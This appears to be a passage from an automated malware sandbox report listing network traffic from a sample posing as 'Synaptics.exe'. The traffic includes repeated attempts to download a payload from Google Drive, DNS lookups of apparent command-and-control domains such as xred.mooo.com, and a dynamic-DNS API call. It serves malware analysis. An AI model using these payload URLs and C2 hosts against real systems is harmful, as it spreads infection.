                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4LBabmw4sT-JCsvcoTPhNiO-1m02otZQQGE9xdHg-6PLurMKidHJjFnAIPmCwAqxajN8Dxo38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:38 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wWgwTKH6t-2j3wTNXqfVig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5PKj0gjZlvsCdru1uVNVr4MdtZMc4AQh_qUyFhF0Dn7iWspvKkjx3XTHzkZihEhVrZwzdUuCMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:38 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-62o_YLA8cl8YfHLHe_CXNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sC2lZrJA-l3hOYAiPt0lyQyjLwqFdVM33GOHBJBpjiv552WQusJ8_F5JMSQZK-z5NContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-H2_9HJIzCwczujo_3Z1K_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Hcwz4wxkCELk8Qx9hid7Tand15HZ9j3eCHIdF6Lxhiok9ZF1vOGm0rCWCFGchKW9Y4A6nLLsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-h4CCyWIbjl7YTN0uvsjLtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC429XhP-hpcchtd5LdC_XfyNf7aJezG5B4iNQmIIyKMt3ouDmTH4ZujKGLXTFl1fiIMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce--W7XS9W0WI45mIuQgoYYow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC69dYK0FNYHSNUpZD9IKA49rX32prAEPTASeClKP0ZyJNn-1eaQnzV0z2yyT73gL2-qContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WnTvZgPk8Q_1wndmH27oag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7d0VWBv34ZQLRsPG3OKChSJYO-WXHJipvBRLR5SjTXcNJ5-6A6pK_3atu750fYmxjw-CTuuP4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UoRYCGhOzfMkS7MvUI9o1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5njZ0O6RLPwF0SWoclJGltMA9ZUvaKO9CShYeHIG0Xeh_WonXKwrxn_sDDzpsAiuRVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x7i3v9nP3K3FdGS-VjK1gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gstVG9ouQspWNOvWXlWMKIOc_4q-zauMGlryv7fSQO1QkjRcCjsIiBB08XSid9f5pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-TOnM3njbDoZvr9dpqpqA4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6FmOF4nQB1QFLxUKowGzw4M578Y53Gpgwcr-5qXO50kj3yg2E8KDIu2MBUV4GIPlfRnw708PYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:43 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-B1C1s3xvcKgqplh3l5kGEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6yuRk96Asy0M-_vUlLbrGGPx_bf5wMgLT1317HoWvzNYudNOpzdPLyowWj1bMZzobcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-fJQwG76P72Cf8HTF18hkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC58GSHqt-Htrb-a5D6tAo-fhb8HmgGAS5EveCdfiDCsgm3oShiyBaRLe8zfKgixWfxKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vd6-Qw0tB3IIU80raDPXmA' 